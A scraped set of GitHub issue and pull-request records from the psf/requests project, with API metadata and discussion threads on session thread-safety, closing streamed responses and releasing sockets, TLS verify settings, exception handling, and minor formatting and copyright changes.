{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2400/reactions" }
https://api.github.com/repos/psf/requests/issues/2400/timeline
null
completed
null
null
false
[ "Why aren't you using grequests for this?\n", "@sigmavirus24 Thanks for the suggestion. Will look it up.\nDoes using grequests allow connection pooling? I briefly looked at it right now and it does not look to be as feature rich as the requests library.\nWe make a ton of HTTP requests and connection pooling is important for us.\n", "At this point in time Session's aren't reliably threadsafe enough for you to use them like this. You're better off creating sessions in each worker and using a Queue to send work to the worker. (So you'll have connection pooling local to the thread but not between threads.)\n", "Closing due to inactivity \n" ]
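The workaround suggested in the last substantive comment above (one Session per worker, fed through a Queue, so pooling is local to each thread) can be sketched with the standard library. The worker function, the `None` sentinel convention, and the thread count are my own choices, not part of requests:

```python
import queue
import threading

import requests

def worker(jobs, results):
    # Each worker owns its own Session: connection pooling happens
    # per-thread, so one worker's blocked pool can't stall the others.
    session = requests.Session()
    while True:
        url = jobs.get()
        if url is None:          # sentinel: shut this worker down
            break
        try:
            resp = session.get(url, timeout=10)
            results.put((url, resp.status_code))
        except requests.exceptions.RequestException as exc:
            results.put((url, exc))

jobs, results = queue.Queue(), queue.Queue()
workers = [threading.Thread(target=worker, args=(jobs, results), daemon=True)
           for _ in range(4)]
for t in workers:
    t.start()
```

The per-request `timeout` also matters here: it keeps a single unresponsive host from tying up a worker indefinitely, which is the failure mode described in the original report.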
https://api.github.com/repos/psf/requests/issues/2399
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2399/labels{/name}
https://api.github.com/repos/psf/requests/issues/2399/comments
https://api.github.com/repos/psf/requests/issues/2399/events
https://github.com/psf/requests/issues/2399
53,460,187
MDU6SXNzdWU1MzQ2MDE4Nw==
2,399
[Proposed Enhancement] Consume remainder of socket in Response.close
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
20
2015-01-05T23:11:00Z
2021-09-08T23:06:13Z
2015-01-13T02:44:59Z
CONTRIBUTOR
resolved
Earlier today I was speaking with @ducu on [IRC](https://botbot.me/freenode/python-requests/2015-01-05/?msg=28835010&page=1) about a problem they're having using `rq` and `requests`. My intuition (which is really all I have to work with about this problem) is that all of the content on the response is not being consumed and people assume that doing something like: ``` py with contextlib.closing(requests.get(url, stream=True)) as response: # do some stuff with response ``` The socket will close properly. If I remember correctly though, we've seen that if the socket isn't completely consumed, this won't allow the socket to be released (at least not immediately). I'm further suspicious this is the cause because killing one of the workers for `rq` lets the job resume. I wonder what people think about changing [`Response.close`](https://github.com/kennethreitz/requests/blob/7612015424c88cfd98f6be692ff994898aee1502/requests/models.py#L833) to be something like: ``` py def close(self): self.content self.raw.release_conn() ``` The call to self.content will consume the rest of the socket (if there's anything to consume) and then we'll release the connection (which should release the socket in this case). Thoughts? Also I'm pretty tired so I could be wrong about some of this stuff.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2399/reactions" }
https://api.github.com/repos/psf/requests/issues/2399/timeline
null
completed
null
null
false
[ "That's not a bad idea. Some notes:\n1. `response.content` may take a very long time to return if timeouts aren't configured. Closing shouldn't hang.\n2. `Response.content` may throw exceptions.\n\nWe need to decide how we're dealing with these problems.\n", "Thank you for helping with this!\n\nTrying to clarify a bit what's happening..\nAs @sigmavirus24 mentioned, I'm using [`rq`](https://github.com/nvie/rq/) and [`summary`](https://github.com/svven/summary/) to process a bunch of URLs. I start several simple (forking) [workers](http://python-rq.org/docs/workers/) so they are doing one URL per job in totally separate processes on the same machine. It all goes fine for a while and suddenly, for no apparent reason, all workers hang at the same time at this line:\n\nhttps://github.com/svven/summary/blob/master/summary/__init__.py#L193\n\nBy hanging I mean suspending the running job and leaving it in the _started_ state. There's no exception whatsoever and it doesn't get passed that line so the job is not finished properly. Then it gets to the next job and does the same thing going on in this \"strike\" mode until the main worker process is killed. All running workers behave this way. Newly started workers perform properly though.\n\nIt's a very peculiar issue and I haven't been able to reproduce it. It just happens after a while - few hours or even days, probably depending on the number of URLs that had been processed.\n\nRunning out of available sockets may be the cause of the problem, I think it's a good assumption but I didn't verify it yet. What puzzles me is the fact that I get no exception whatsoever, the child (forked) process doing the job simply dies at that line.\n", "> That's not a bad idea.\n\nI'm also not entirely certain it's a good idea for the reasons you mentioned. 
The major benefit is that it would then match exactly the behaviour most users seem to expect from it.\n", "Regarding the proposed solution, isn't it enough to `self.raw.release_conn()` while closing?\n\nI don't want to be picky but reading the whole response would trash a good part of `summary`. As stated there, \"summary extraction is performed gradually by parsing the HTML <head> tag first, applying specific head extraction techniques, and goes on to the <body> only if data is not complete.\"\n\nOh by the way, while iterating the HTML response, the routine starts iterating through image files from that page and does so in the same manner having `stream=True`. So basically:\n\n``` python\nwith contextlib.closing(requests.get(html_url, stream=True)) as html_response:\n # do some stuff with html_response like getting the img_url\n with contextlib.closing(requests.get(img_url, stream=True)) as img_response:\n # check the image file\n```\n\nIs this bad? Still it is working fine for a while.. but it may keep sockets from being released I guess..\n\nAnyways if you have any hints please let me know, cheers\n", "> Regarding the proposed solution, isn't it enough to self.raw.release_conn() while closing?\n\nNo. That releases a connection back to the connection pool in urllib3 which does not necessarily close the underlying socket.\n\n> Is this bad?\n\nNot exactly. If you weren't using `stream=True` in the first place, you would get a performance benefit from using a session if `html_url` and `img_url` used the same scheme and host. Since you are using `stream=True` you're still creating 2 sockets (which are the expensive part of the request/response cycle). That's probably more information than you wanted to know, but I thought you might be interested anyway.\n\n> I don't want to be picky but reading the whole response would trash a good part of summary.\n\nThere isn't a really good way to forcibly close the socket otherwise. 
Not without digging 6 or 10 layers deep into the response object from urllib3 to find the socket. I've been down those layers before, and most of the paths are through internal (private) methods and attributes which no one should be relying on for any reason.\n", "Also, I'd expect the 'running out of sockets' case not to be a 'block forever' error mode, but a 'die instantly' mode. If you hit your ulimit I'm pretty sure you get killed.\n", "Yes that's exactly what happens - it doesn't 'block at all', but it just 'dies instantly'.\n\nI'll try to monitor the sockets and verify this assumption, but if 'running out of sockets' is the reason, how can I prevent this from happening? Isn't there a way to get an exception in this case? To me this looks like a bug, especially if the sockets are not released in case of partial requests.get with stream=True.\n", "I wonder if calling `select` and checking if the socket is marked readable is a good idea. If it is we can pre-emptively close it, because either there's still data on it (and so it hasn't been exhausted) or it was closed remotely (and so closing it here is a no-op). @sigmavirus24?\n", "(Note that doing this might belong in urllib3: @shazow?)\n", "Maybe I'm missing something, but shouldn't we close the socket on [`Response.close()`](https://github.com/kennethreitz/requests/blob/7612015424c88cfd98f6be692ff994898aee1502/requests/models.py#L833)? \nI mean even for streaming requests, closing the response means one doesn't care about the rest of the data, so why keep the socket open?\n", "> I wonder if calling select and checking if the socket is marked readable is a good idea.\n\nIsn't select a problem on Windows?\n\n> Maybe I'm missing something, but shouldn't we close the socket on Response.close()? \n\nQuoting myself from a few comments up:\n\n> There isn't a really good way to forcibly close the socket otherwise. Not without digging 6 or 10 layers deep into the response object from urllib3 to find the socket. 
I've been down those layers before, and most of the paths are through internal (private) methods and attributes which no one should be relying on for any reason.\n\nFurther, `summary` will probably already get \"trashed\" if at any point you receive a redirect that has a body. We use the same logic as I'm proposing for `Response.close` when following redirects to prevent a socket leak in the case where `stream=True`.\n", "Select is fine, poll is nonexistent on Windows.\n", "@sigmavirus24: Ok I understand there's no easy way to access the socket..\nBut in my opinion, reading the whole content of the response when `stream=True` defies the purpose of having the streaming feature, isn't it?\n\nAnyway if `requests` follows the redirects there's no problem with `summary`. It actually follows http_equiv_refresh \"redirects\" as well: https://github.com/svven/summary/blob/master/summary/__init__.py#L209\n\nGetting back to the actual issue..\nI'm trying to reproduce the problem like this: https://gist.github.com/ducu/a684c1e96afdaf2c5657\n\nDo you think that [`psutil.Process.connections`](https://pythonhosted.org/psutil/#psutil.Process.connections) would show leaking sockets? Didn't try it properly yet but seen it running on Windows and Ubuntu, interesting how they behave differently, but no signs of leaking sockets for ~300 URLs.\nI'll try it out on OS X tonight where I experienced the \"worker strike\" issue, and I'll feed it more URLs.\nAm I on the right track here?\n", "> Select is fine, poll is nonexistent on Windows.\n\nRight. I always think poll is affected too. Sorry.\n\n> Anyway if requests follows the redirects there're no problem with summary.\n\nIf the request is empty there's no problem for you. If it isn't empty then we have to consume the entire socket which is exactly what I'm proposing we do here to fix it. So if you're encountering redirects in any number and summary isn't having problems with them, then this solution shouldn't \"trash\" summary either. 
Have you done any performance benchmarks to see if this has a realistic effect on summary's performance or is this a pre-benchmark optimization?\n", "> Do you think that psutil.Process.connections would show leaking sockets? \n\nJudging by the documentation it should show sockets that are potentially still open. I've had mixed luck with psutil in trying to reproduce other things though that system tools generally seem to handle better.\n\n> Didn't try it properly yet but seen it running on Windows and Ubuntu, interesting how they behave differently, but no signs of leaking sockets for ~300 URLs.\n\nDidn't you say this took days to occur? I doubt it would appear overnight if you've only encountered it after days of summary running.\n\n> I'll try it out on OS X tonight where I experienced the \"worker strike\" issue, and I'll feed it more URLs.\n> Am I on the right track here?\n\nIt would seem so, but I'd rather keep the discussion of the enhancement at the core of this issue. If you want help debugging this, we can do it in IRC.\n", "> Have you done any performance benchmarks to see if this has a realistic effect on summary's performance or is this a pre-benchmark optimization?\n\nNope, pre-benchmark optimization indeed but also empirical observation.\nI know that establishing connections is the expensive part as you said, but still I'd like to avoid downloading useless content if possible.\n\n> Didn't you say this took days to occur? \n\nYes indeed, it will take a while to reproduce this, maybe I'll switch to using `summary` instead of `requests` and see the difference in socket usage. If that doesn't work I'll throw in `rq` as well.\n\nRegarding the enhancement I can't say much and maybe I didn't quite get your proposed solution. \nBut it seems that by getting the whole content you're turning a streaming request into a regular one. \n", "> I wonder if calling select and checking if the socket is marked readable is a good idea. 
If it is we can pre-emptively close it, because either there's still data on it (and so it hasn't been exhausted) or it was closed remotely (and so closing it here is a no-op)\n\nI've always assumed that this is in effect what https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py#L12 does, among other things.\n\nI'm not sure always consuming a socket before closing is a great idea, there could be a lot to consume or it could be a never-ending streaming connection etc.\n", "> I'm not sure always consuming a socket before closing is a great idea, there could be a lot to consume or it could be a never-ending streaming connection etc.\n\nExactly my point. Any other suggestions?\n\n—\nSent from Mailbox\n", "> Exactly my point. Any other suggestions?\n\nIt seems this thread is on the right track. Closing a socket should be sufficient, need to figure out why it's not working as expected in this case.\n", "Sorry guys, it's not what we assumed, the sockets are being closed properly.\n\nIt's a different problem which has to do with `requests` being used in both a main process and a forked process -- the `rq` worker script. If the network goes down even for a short while, `requests` raises few exceptions then it becomes unusable and the forked processes get killed instantly if they try to use it. This messes up `rq` jobs by leaving them in the 'started' status, so this is also an `rq` issue (https://github.com/nvie/rq/issues/473).\n\nI've put up a [gist](https://gist.github.com/ducu/ee8c0b1028775df6c72e) to reproduce the problem, but I'll create a new bug ticket and describe it there.\n\nThanks a lot for your support\n" ]
https://api.github.com/repos/psf/requests/issues/2398
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2398/labels{/name}
https://api.github.com/repos/psf/requests/issues/2398/comments
https://api.github.com/repos/psf/requests/issues/2398/events
https://github.com/psf/requests/issues/2398
53,357,804
MDU6SXNzdWU1MzM1NzgwNA==
2,398
Clarify InsecureRequestWarning and verify=True in docs
{ "avatar_url": "https://avatars.githubusercontent.com/u/109467?v=4", "events_url": "https://api.github.com/users/rsyring/events{/privacy}", "followers_url": "https://api.github.com/users/rsyring/followers", "following_url": "https://api.github.com/users/rsyring/following{/other_user}", "gists_url": "https://api.github.com/users/rsyring/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rsyring", "id": 109467, "login": "rsyring", "node_id": "MDQ6VXNlcjEwOTQ2Nw==", "organizations_url": "https://api.github.com/users/rsyring/orgs", "received_events_url": "https://api.github.com/users/rsyring/received_events", "repos_url": "https://api.github.com/users/rsyring/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rsyring/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rsyring/subscriptions", "type": "User", "url": "https://api.github.com/users/rsyring", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-05T02:05:53Z
2021-09-08T23:06:14Z
2015-01-05T02:36:36Z
NONE
resolved
The docs: http://docs.python-requests.org/en/latest/user/advanced/#ssl-cert-verification say: > By default, verify is set to True. Option verify only applies to host certs. If my HTTPS connection is being verified by default, why am I also seeing a InsecureRequestWarning? Clarifying this situation and updating the docs with more info would be helpful IMO.
{ "avatar_url": "https://avatars.githubusercontent.com/u/109467?v=4", "events_url": "https://api.github.com/users/rsyring/events{/privacy}", "followers_url": "https://api.github.com/users/rsyring/followers", "following_url": "https://api.github.com/users/rsyring/following{/other_user}", "gists_url": "https://api.github.com/users/rsyring/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rsyring", "id": 109467, "login": "rsyring", "node_id": "MDQ6VXNlcjEwOTQ2Nw==", "organizations_url": "https://api.github.com/users/rsyring/orgs", "received_events_url": "https://api.github.com/users/rsyring/received_events", "repos_url": "https://api.github.com/users/rsyring/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rsyring/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rsyring/subscriptions", "type": "User", "url": "https://api.github.com/users/rsyring", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2398/reactions" }
https://api.github.com/repos/psf/requests/issues/2398/timeline
null
completed
null
null
false
[ "> If my HTTPS connection is being verified by default, why am I also seeing a InsecureRequestWarning? Clarifying this situation and updating the docs with more info would be helpful IMO.\n\nI don't know why. Can you give us any details to help you?\n", "> I don't know why. Can you give us any details to help you?\n\nThank you for the prompt response. Actually, this was my fault. I didn't realize I was using a session that had verify=False. The warning did exactly what it was supposed to, I just thought it was someone elses's fault! :o/\n\nThanks again.\n", "Hah. No worries.\n" ]
https://api.github.com/repos/psf/requests/issues/2397
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2397/labels{/name}
https://api.github.com/repos/psf/requests/issues/2397/comments
https://api.github.com/repos/psf/requests/issues/2397/events
https://github.com/psf/requests/issues/2397
53,324,502
MDU6SXNzdWU1MzMyNDUwMg==
2,397
how can I get the "exception code"
{ "avatar_url": "https://avatars.githubusercontent.com/u/9110611?v=4", "events_url": "https://api.github.com/users/tdyhacker/events{/privacy}", "followers_url": "https://api.github.com/users/tdyhacker/followers", "following_url": "https://api.github.com/users/tdyhacker/following{/other_user}", "gists_url": "https://api.github.com/users/tdyhacker/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tdyhacker", "id": 9110611, "login": "tdyhacker", "node_id": "MDQ6VXNlcjkxMTA2MTE=", "organizations_url": "https://api.github.com/users/tdyhacker/orgs", "received_events_url": "https://api.github.com/users/tdyhacker/received_events", "repos_url": "https://api.github.com/users/tdyhacker/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tdyhacker/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tdyhacker/subscriptions", "type": "User", "url": "https://api.github.com/users/tdyhacker", "user_view_type": "public" }
[ { "color": "777777", "default": false, "description": null, "id": 162780722, "name": "Question/Not a bug", "node_id": "MDU6TGFiZWwxNjI3ODA3MjI=", "url": "https://api.github.com/repos/psf/requests/labels/Question/Not%20a%20bug" } ]
closed
true
null
[]
null
1
2015-01-04T04:06:28Z
2021-09-08T23:06:47Z
2015-01-04T04:10:22Z
NONE
resolved
I am using "requests (2.5.1)" .now I want to catch the exception and return an dict with some exception message,the dict I will return is as following: ``` { "status_code": 61, # exception code, "msg": "error msg", } ``` but now I can't get the error status_code and error message,I try to use ``` except requests.exceptions.ConnectionError as e: response={ u'status_code':4040, u'errno': e.errno, u'message': (e.message.reason), u'strerror': e.strerror, u'response':e.response, } ``` but it's too redundancy,how can I get the error message simplicity?anyone can give some idea?
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2397/reactions" }
https://api.github.com/repos/psf/requests/issues/2397/timeline
null
completed
null
null
false
[ "Questions belong on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n" ]
https://api.github.com/repos/psf/requests/issues/2396
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2396/labels{/name}
https://api.github.com/repos/psf/requests/issues/2396/comments
https://api.github.com/repos/psf/requests/issues/2396/events
https://github.com/psf/requests/pull/2396
53,232,433
MDExOlB1bGxSZXF1ZXN0MjY3NDc4NDU=
2,396
Improving format (whitespace related PEP8).
{ "avatar_url": "https://avatars.githubusercontent.com/u/3359485?v=4", "events_url": "https://api.github.com/users/rtzll/events{/privacy}", "followers_url": "https://api.github.com/users/rtzll/followers", "following_url": "https://api.github.com/users/rtzll/following{/other_user}", "gists_url": "https://api.github.com/users/rtzll/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rtzll", "id": 3359485, "login": "rtzll", "node_id": "MDQ6VXNlcjMzNTk0ODU=", "organizations_url": "https://api.github.com/users/rtzll/orgs", "received_events_url": "https://api.github.com/users/rtzll/received_events", "repos_url": "https://api.github.com/users/rtzll/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rtzll/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rtzll/subscriptions", "type": "User", "url": "https://api.github.com/users/rtzll", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2015-01-02T00:11:24Z
2021-09-08T09:01:02Z
2015-01-02T00:31:02Z
NONE
resolved
A few instances of too much or too few whitespace.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2396/reactions" }
https://api.github.com/repos/psf/requests/issues/2396/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2396.diff", "html_url": "https://github.com/psf/requests/pull/2396", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2396.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2396" }
true
[ "requests does not follow PEP8. Kenneth disagrees with many of the suggestions. You can read more on #1543, #1964, and #2298 \n" ]
https://api.github.com/repos/psf/requests/issues/2395
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2395/labels{/name}
https://api.github.com/repos/psf/requests/issues/2395/comments
https://api.github.com/repos/psf/requests/issues/2395/events
https://github.com/psf/requests/pull/2395
53,212,239
MDExOlB1bGxSZXF1ZXN0MjY3NDAzMzI=
2,395
Changing year in all copyright information
{ "avatar_url": "https://avatars.githubusercontent.com/u/240368?v=4", "events_url": "https://api.github.com/users/shrayasr/events{/privacy}", "followers_url": "https://api.github.com/users/shrayasr/followers", "following_url": "https://api.github.com/users/shrayasr/following{/other_user}", "gists_url": "https://api.github.com/users/shrayasr/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/shrayasr", "id": 240368, "login": "shrayasr", "node_id": "MDQ6VXNlcjI0MDM2OA==", "organizations_url": "https://api.github.com/users/shrayasr/orgs", "received_events_url": "https://api.github.com/users/shrayasr/received_events", "repos_url": "https://api.github.com/users/shrayasr/repos", "site_admin": false, "starred_url": "https://api.github.com/users/shrayasr/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/shrayasr/subscriptions", "type": "User", "url": "https://api.github.com/users/shrayasr", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-01T03:36:18Z
2021-09-08T09:01:03Z
2015-01-01T08:28:11Z
CONTRIBUTOR
resolved
:tada: :tada: Happy new year! Thanks for this awesome library :) :tada: :tada:
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2395/reactions" }
https://api.github.com/repos/psf/requests/issues/2395/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2395.diff", "html_url": "https://github.com/psf/requests/pull/2395", "merged_at": "2015-01-01T08:28:11Z", "patch_url": "https://github.com/psf/requests/pull/2395.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2395" }
true
[ ":tada: :balloon: :cake:\n\nThanks so much!\n", ":) Hope you had a good one!\n" ]
https://api.github.com/repos/psf/requests/issues/2394
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2394/labels{/name}
https://api.github.com/repos/psf/requests/issues/2394/comments
https://api.github.com/repos/psf/requests/issues/2394/events
https://github.com/psf/requests/issues/2394
53,193,747
MDU6SXNzdWU1MzE5Mzc0Nw==
2,394
verify is sticky in Session
{ "avatar_url": "https://avatars.githubusercontent.com/u/4239113?v=4", "events_url": "https://api.github.com/users/slowaak/events{/privacy}", "followers_url": "https://api.github.com/users/slowaak/followers", "following_url": "https://api.github.com/users/slowaak/following{/other_user}", "gists_url": "https://api.github.com/users/slowaak/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/slowaak", "id": 4239113, "login": "slowaak", "node_id": "MDQ6VXNlcjQyMzkxMTM=", "organizations_url": "https://api.github.com/users/slowaak/orgs", "received_events_url": "https://api.github.com/users/slowaak/received_events", "repos_url": "https://api.github.com/users/slowaak/repos", "site_admin": false, "starred_url": "https://api.github.com/users/slowaak/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/slowaak/subscriptions", "type": "User", "url": "https://api.github.com/users/slowaak", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-31T17:23:52Z
2021-09-08T23:06:48Z
2014-12-31T17:25:40Z
NONE
resolved
I'm using Session.request to do GET from an HTTPS URL where the server-side certificate may be invalid. For testing purposes, if the certificate is invalid, I want to retry the GET with 'verify=False'. I'm reusing the Session for the retry, but the second request also fails even though I specify 'verify=False' in the request. It seems that the verify state is persisted in the Session somewhere and not updated from the request parameters if already set in a previous request. Is this the expected behavior? It seems unusual to me. If I create a new Session for the second request the certificate doesn't get checked in this request.
